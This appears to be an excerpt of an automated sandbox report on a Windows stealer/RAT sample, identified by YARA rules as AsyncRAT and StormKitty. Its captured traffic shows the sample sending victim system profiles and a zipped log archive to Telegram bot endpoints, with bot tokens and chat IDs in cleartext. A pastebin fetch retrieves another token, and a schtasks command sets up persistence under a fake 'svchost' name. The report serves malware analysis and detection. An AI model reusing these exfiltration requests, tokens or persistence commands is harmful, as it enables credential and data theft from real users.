2024-06-28 09:19:40 UTC | 88 | IN | Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 31 39 35 35 37 39 30 35 7d
Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1719557905}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 64791 | 149.154.167.220 | 443 | 4884 | C:\Users\user\AppData\Local\Temp\udwnme.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-28 09:19:40 UTC | 1722 | OUT | GET /bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:30%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%2 [TRUNCATED]
Host: api.telegram.org
Connection: Keep-Alive
2024-06-28 09:19:40 UTC | 346 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.18.0
Date: Fri, 28 Jun 2024 09:19:40 GMT
Content-Type: application/json
Content-Length: 56
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-28 09:19:40 UTC | 56 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 64792 | 149.154.167.220 | 443 | 4884 | C:\Users\user\AppData\Local\Temp\udwnme.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-28 09:19:41 UTC | 171 | OUT | GET /bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
Host: api.telegram.org
2024-06-28 09:19:41 UTC | 346 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.18.0
Date: Fri, 28 Jun 2024 09:19:41 GMT
Content-Type: application/json
Content-Length: 56
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-28 09:19:41 UTC | 56 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


Session ID: 3
Source IP: 192.168.2.4    Source Port: 64796
Destination IP: 104.21.44.66    Destination Port: 443
PID: 5052
Process: C:\Users\user\AppData\Local\Temp\luglzv.exe

[2024-06-28 09:19:53 UTC] 112 bytes OUT
GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
Host: api.mylnikov.org
Connection: Keep-Alive

[2024-06-28 09:19:53 UTC] 799 bytes IN
HTTP/1.1 200 OK
Date: Fri, 28 Jun 2024 09:19:53 GMT
Content-Type: application/json; charset=utf8
Content-Length: 88
Connection: close
Access-Control-Allow-Origin: *
Cache-Control: max-age=2678400
CF-Cache-Status: HIT
Age: 8488
Last-Modified: Fri, 28 Jun 2024 06:58:25 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3kW404a5yLmreaQBcOZUKAgPfEmIpBxLrY2CfP%2BW8bAZxzpE2RHJ%2FqOReD4tIwYbCWNTdRzkp%2F%2BnOnYptc%2FLHb7QmiOL%2B0s7cH9UXHCGLGSealUB%2BLRTzVThgf1d%2BW1i9WOR"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 89ac9905baa142b8-EWR
alt-svc: h3=":443"; ma=86400

[2024-06-28 09:19:53 UTC] 88 bytes IN
Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 31 39 35 35 37 39 30 35 7d
Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1719557905}


Session ID: 4
Source IP: 192.168.2.4    Source Port: 64797
Destination IP: 149.154.167.220    Destination Port: 443
PID: 5052
Process: C:\Users\user\AppData\Local\Temp\luglzv.exe

[2024-06-28 09:19:53 UTC] 1722 bytes OUT
GET /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:44%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%2 [TRUNCATED]
Host: api.telegram.org
Connection: Keep-Alive

[2024-06-28 09:19:54 UTC] 389 bytes IN
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 28 Jun 2024 09:19:54 GMT
Content-Type: application/json
Content-Length: 1870
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

[2024-06-28 09:19:54 UTC] 1870 bytes IN
Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 36 36 32 38 30 35 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 69 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 64 69 61 6d 6f 74 72 69 78 65 64 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 39 35 36 36 33 39 34 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 63 5c
Data Ascii: {"ok":true,"result":{"message_id":972,"from":{"id":6766280506,"is_bot":true,"first_name":"Diamotriiix","username":"diamotrixedbot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1719566394,"text":"\ud83c\


Session ID: 5
Source IP: 192.168.2.4    Source Port: 64798
Destination IP: 149.154.167.220    Destination Port: 443
PID: 5052
Process: C:\Users\user\AppData\Local\Temp\luglzv.exe

[2024-06-28 09:19:54 UTC] 171 bytes OUT
GET /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
Host: api.telegram.org

[2024-06-28 09:19:55 UTC] 388 bytes IN
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 28 Jun 2024 09:19:54 GMT
Content-Type: application/json
Content-Length: 288
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

[2024-06-28 09:19:55 UTC] 288 bytes IN
Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 36 36 32 38 30 35 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 69 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 64 69 61 6d 6f 74 72 69 78 65 64 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 39 35 36 36 33 39 34 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 64 5c
Data Ascii: {"ok":true,"result":{"message_id":973,"from":{"id":6766280506,"is_bot":true,"first_name":"Diamotriiix","username":"diamotrixedbot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1719566394,"text":"\ud83d\


Session ID: 6
Source IP: 192.168.2.4    Source Port: 64799
Destination IP: 149.154.167.220    Destination Port: 443
PID: 5052
Process: C:\Users\user\AppData\Local\Temp\luglzv.exe

[2024-06-28 09:19:55 UTC] 254 bytes OUT
POST /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795480469 HTTP/1.1
Content-Type: multipart/form-data; boundary="41deac85-9fb9-4f5f-9506-a40f6f02b564"
Host: api.telegram.org
Content-Length: 152152
Expect: 100-continue

[2024-06-28 09:19:56 UTC] 40 bytes OUT
Data Raw: 2d 2d 34 31 64 65 61 63 38 35 2d 39 66 62 39 2d 34 66 35 66 2d 39 35 30 36 2d 61 34 30 66 36 66 30 32 62 35 36 34 0d 0a
Data Ascii: --41deac85-9fb9-4f5f-9506-a40f6f02b564

[2024-06-28 09:19:56 UTC] 265 bytes OUT
Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 61 36 39 35 31 32 39 39 61 31 65 30 64 31 62 61 31 33 37 31 64 62 63 33 36 62 37 61 39 32 64 39 5c 6a 6f 6e 65 73 40 38 38 38 36 38 33 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 61 36 39 35 31 32 39 39 61 31 65 30 64 31 62 61 31 33 37 31 64 62 63 33 36 62 37 61 39 32 64 39 25 35 43 6a 6f 6e 65 73 25 34 30 38 38 38 36 38 33 5f 65 6e 2d
Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5Ca6951299a1e0d1ba1371dbc36b7a92d9%5Cuser%40888683_en-
[2024-06-28 09:19:56 UTC] 25 bytes IN
HTTP/1.1 100 Continue

[2024-06-28 09:19:56 UTC] 893 bytes IN
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 28 Jun 2024 09:19:56 GMT
Content-Type: application/json
Content-Length: 505
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

{"ok":true,"result":{"message_id":974,"from":{"id":6766280506,"is_bot":true,"first_name":"Diamotriiix","username":"diamotrixedbot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1719566396,"document":{"file_name":"C_UsersuserAppDataLocala6951299a1e0d1ba1371dbc36b7a92d9user@88.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIDzmZ-gDx51sJCRW0m1A1KWKvDulRWAAIyHAACmJL4U8SLoH2unx6SNQQ","file_unique_id":"AgADMhwAApiS-FM","file_size":151803}}}


Session ID: 7
Source IP: 192.168.2.4    Source Port: 64801
Destination IP: 104.20.4.235    Destination Port: 443
PID: 5052
Process: C:\Users\user\AppData\Local\Temp\luglzv.exe

[2024-06-28 09:19:57 UTC] 74 bytes OUT
GET /raw/7B75u64B HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive

[2024-06-28 09:19:57 UTC] 391 bytes IN
HTTP/1.1 200 OK
Date: Fri, 28 Jun 2024 09:19:57 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Fri, 28 Jun 2024 07:39:15 GMT
Server: cloudflare
CF-RAY: 89ac99204aff4264-EWR

[2024-06-28 09:19:57 UTC] 52 bytes IN
Data Raw: 32 65 0d 0a 35 33 39 30 37 35 37 37 38 38 3a 41 41 46 56 36 35 59 64 75 6e 39 4f 50 34 30 67 37 38 58 78 49 35 65 44 62 56 34 32 4b 71 48 59 35 6d 55 0d 0a
Data Ascii: 2e5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU

[2024-06-28 09:19:57 UTC] 5 bytes IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 8
Source IP: 192.168.2.4    Source Port: 64802
Destination IP: 149.154.167.220    Destination Port: 443
PID: 5052
Process: C:\Users\user\AppData\Local\Temp\luglzv.exe

[2024-06-28 09:19:58 UTC] 254 bytes OUT
POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1
Content-Type: multipart/form-data; boundary="10e946af-e98d-41dd-8591-bd5457d5eee6"
Host: api.telegram.org
Content-Length: 152152
Expect: 100-continue

[2024-06-28 09:19:58 UTC] 40 bytes OUT
Data Raw: 2d 2d 31 30 65 39 34 36 61 66 2d 65 39 38 64 2d 34 31 64 64 2d 38 35 39 31 2d 62 64 35 34 35 37 64 35 65 65 65 36 0d 0a
Data Ascii: --10e946af-e98d-41dd-8591-bd5457d5eee6

[2024-06-28 09:19:58 UTC] 265 bytes OUT
Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 61 36 39 35 31 32 39 39 61 31 65 30 64 31 62 61 31 33 37 31 64 62 63 33 36 62 37 61 39 32 64 39 5c 6a 6f 6e 65 73 40 38 38 38 36 38 33 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 61 36 39 35 31 32 39 39 61 31 65 30 64 31 62 61 31 33 37 31 64 62 63 33 36 62 37 61 39 32 64 39 25 35 43 6a 6f 6e 65 73 25 34 30 38 38 38 36 38 33 5f 65 6e 2d
Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5Ca6951299a1e0d1ba1371dbc36b7a92d9%5Cuser%40888683_en-
                                                                  Data Ascii: 6XKh*&thK|}sTUqO,h5}vI66rz`{v/)Z}!d/od?\JL\z*f"DxpXQHhaK6{),.b*A Q`Ps;X;vVK
                                                                  2024-06-28 09:19:58 UTC16355OUTData Raw: 90 3e fe 8a 7b a8 16 cd f8 21 4c 83 61 49 83 2d cf 55 be 39 2e 19 e9 d3 3b 01 43 ab 49 47 61 4c e3 3c de 76 a4 8c 0b 73 66 52 6d 31 04 0f 96 24 54 95 99 62 0e 38 6b 0e 65 c5 a0 73 3b ab 03 9f 77 d3 f6 91 8a b6 27 27 08 b8 55 5e 49 4a e7 7a 9e 33 e3 0c 5f 09 57 45 47 df c5 35 7f 87 99 ef 59 3f f9 6a c2 ce 5c c6 0f e5 9e b9 c1 1f 39 ac db 78 17 10 1b 64 e9 b7 12 36 94 8c 72 12 b9 f7 4b d9 c1 cd 45 f0 83 73 16 2f c9 b0 fa 9d 1a e3 24 20 5e 08 f1 a1 b5 c8 1f 80 c8 79 31 48 1e 56 a0 a3 d7 ee 9b 79 3d 98 4a 1b 60 ab 77 ad 38 44 1a 99 3c 18 fa c8 13 64 75 8f 54 47 c9 45 f0 41 62 b2 cd 94 d9 9d 24 bb 9d 7d 7d d0 8f 78 ee 6b bc 21 77 6d 42 f3 35 01 a8 15 c0 34 4d 65 58 fd 4c c8 2a 9d 98 16 61 70 4b ae ef f5 11 38 b8 00 85 76 36 3b cf d8 f4 71 70 fe fd d0 b5 42 b5
                                                                  Data Ascii: >{!LaI-U9.;CIGaL<vsfRm1$Tb8kes;w''U^IJz3_WEG5Y?j\9xd6rKEs/$ ^y1HVy=J`w8D<duTGEAb$}}xk!wmB54MeXL*apK8v6;qpB
                                                                  2024-06-28 09:19:59 UTC25INHTTP/1.1 100 Continue
                                                                  2024-06-28 09:19:59 UTC405INHTTP/1.1 401 Unauthorized
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 28 Jun 2024 09:19:59 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 58
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":false,"error_code":401,"description":"Unauthorized"}



                                                                  Target ID:0
                                                                  Start time:05:18:54
                                                                  Start date:28/06/2024
                                                                  Path:C:\Users\user\Desktop\zrrHgsDzgS.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\zrrHgsDzgS.exe"
                                                                  Imagebase:0x660000
                                                                  File size:48'640 bytes
                                                                  MD5 hash:6D13D147A209E3BE044035F0C03B7BDE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1725153654.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000002.1725732577.0000000002971000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1725732577.0000000002971000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:05:18:58
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:05:18:59
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:05:18:59
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF775.tmp.bat""
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:05:18:59
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:05:18:59
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                                                                  Imagebase:0x940000
                                                                  File size:187'904 bytes
                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:05:18:59
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout 3
                                                                  Imagebase:0x290000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:05:19:01
                                                                  Start date:28/06/2024
                                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Imagebase:0xc40000
                                                                  File size:48'640 bytes
                                                                  MD5 hash:6D13D147A209E3BE044035F0C03B7BDE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2919350933.0000000003312000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2929848498.0000000005B77000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2930700554.0000000005BAE000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
